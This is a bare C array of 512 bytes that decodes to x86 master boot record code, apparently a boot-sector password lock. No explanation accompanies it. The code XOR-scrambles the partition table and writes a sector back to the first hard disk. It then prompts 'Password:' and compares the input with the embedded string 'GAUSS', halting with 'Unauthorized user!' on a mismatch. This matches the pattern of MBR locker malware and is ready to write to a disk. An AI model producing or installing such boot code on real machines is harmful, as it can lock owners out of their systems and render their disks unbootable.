
{0xFA,0x33,0xC0,0x8E,0xD0,0xBC,0x00,0x7C,0x8B,0xF4,0x50,0x07,
	0x50,0x1F,0xFB,0xFC,0xBF,0x00,0x06,0xB9,0x00,0x01,0xF2,0xA5,
	0xEA,0x1D,0x06,0x00,0x00,0xBE,0xBE,0x07,0xB9,0x20,0x00,0x81,
	0x34,0xAA,0xAA,0x46,0x46,0xE2,0xF8,0xB8,0x01,0x03,0xBB,0x00,
	0x06,0xB9,0x01,0x00,0xBA,0x80,0x00,0xCD,0x13,0xBE,0x0F,0x07,
	0xE8,0xEE,0x00,0xBF,0x00,0x08,0xE8,0xF8,0x00,0xBE,0x00,0x08,
	0xBF,0xAE,0x07,0x32,0xED,0x8A,0x0D,0xF3,0xA6,0x74,0x08,0xBE,
	0x19,0x07,0xE8,0xD4,0x00,0xEB,0xFE,0xBE,0xBE,0x07,0xB3,0x04,
	0x80,0x3C,0x80,0x74,0x0E,0x80,0x3C,0x00,0x75,0x1C,0x83,0xC6,
	0x10,0xFE,0xCB,0x75,0xEF,0xCD,0x18,0x8B,0x14,0x8B,0x4C,0x02,
	0x8B,0xEE,0x83,0xC6,0x10,0xFE,0xCB,0x74,0x0D,0x80,0x3C,0x00,
	0x74,0xF4,0xBE,0xBC,0x06,0xE8,0xA1,0x00,0xEB,0xFE,0xBF,0x05,
	0x00,0xBB,0x00,0x7C,0xB8,0x01,0x02,0x57,0xCD,0x13,0x5F,0x73,
	0x0C,0x33,0xC0,0xCD,0x13,0x4F,0x75,0xED,0xBE,0xD5,0x06,0xEB,
	0xE0,0xBE,0xF5,0x06,0xBF,0xFE,0x7D,0x81,0x3D,0x55,0xAA,0x75,
	0xD4,0x8B,0xF5,0xEA,0x00,0x7C,0x00,0x00,0x49,0x6E,0x76,0x61,
	0x6C,0x69,0x64,0x20,0x70,0x61,0x72,0x74,0x69,0x74,0x69,0x6F,
	0x6E,0x20,0x74,0x61,0x62,0x6C,0x65,0x21,0x00,0x45,0x72,0x72,
	0x6F,0x72,0x20,0x6C,0x6F,0x61,0x64,0x69,0x6E,0x67,0x20,0x6F,
	0x70,0x65,0x72,0x61,0x74,0x69,0x6E,0x67,0x20,0x73,0x79,0x73,
	0x74,0x65,0x6D,0x21,0x00,0x4D,0x69,0x73,0x73,0x69,0x6E,0x67,
	0x20,0x6F,0x70,0x65,0x72,0x61,0x74,0x69,0x6E,0x67,0x20,0x73,
	0x79,0x73,0x74,0x65,0x6D,0x21,0x00,0x50,0x61,0x73,0x73,0x77,
	0x6F,0x72,0x64,0x3A,0x00,0x55,0x6E,0x61,0x75,0x74,0x68,0x6F,
	0x72,0x69,0x7A,0x65,0x64,0x20,0x75,0x73,0x65,0x72,0x21,0x00,
	0x00,0xAC,0x3C,0x00,0x74,0x0A,0xB7,0x09,0x56,0xB4,0x0E,0xCD,
	0x10,0x5E,0xEB,0xF1,0xC3,0x06,0x57,0x0E,0x07,0x47,0xC6,0x06,
	0x2C,0x01,0x00,0x80,0x3E,0x2C,0x01,0x0F,0x7D,0x4E,0xB4,0x01,
	0xCD,0x16,0x74,0xF3,0xB8,0x00,0x00,0xCD,0x16,0x3C,0x00,0x74,
	0xEA,0x3C,0x08,0x74,0x14,0x3C,0x0D,0x74,0x37,0xAA,0xB0,0x2A,
	0xBB,0x00,0x00,0xB4,0x0E,0xCD,0x10,0xFE,0x06,0x2C,0x01,0xEB,
	0xD2,0x80,0x3E,0x2C,0x01,0x00,0x74,0xCB,0x4F,0xB0,0x00,0xAA,
	0xB4,0x03,0xB7,0x00,0xCD,0x10,0x4A,0xB4,0x02,0xCD,0x10,0xB0,
	0x20,0xB4,0x0E,0xCD,0x10,0xB4,0x02,0xCD,0x10,0xFE,0x0E,0x2C,
	0x01,0x4F,0xEB,0xAB,0x5F,0xA0,0x2C,0x01,0x88,0x05,0x07,0xC3,
	0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x05,0x47,
	0x41,0x55,0x53,0x53,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
	0x00,0x00,0x80,0x01,0x01,0x00,0x0B,0xFE,0x3F,0x79,0x3F,0x00,
	0x00,0x00,0xBB,0xE7,0x1D,0x00,0x00,0x00,0x01,0x7A,0x82,0xFE,
	0x3F,0x80,0xFA,0xE7,0x1D,0x00,0x47,0xB7,0x01,0x00,0x00,0x00,
	0x01,0x81,0x83,0xFE,0x3F,0xE6,0x41,0x9F,0x1F,0x00,0xE6,0x00,
	0x19,0x00,0x00,0x00,0x01,0xE7,0x0F,0xFE,0xBF,0x0B,0x27,0xA0,
	0x38,0x00,0xA6,0x11,0x48,0x00,0x55,0xAA};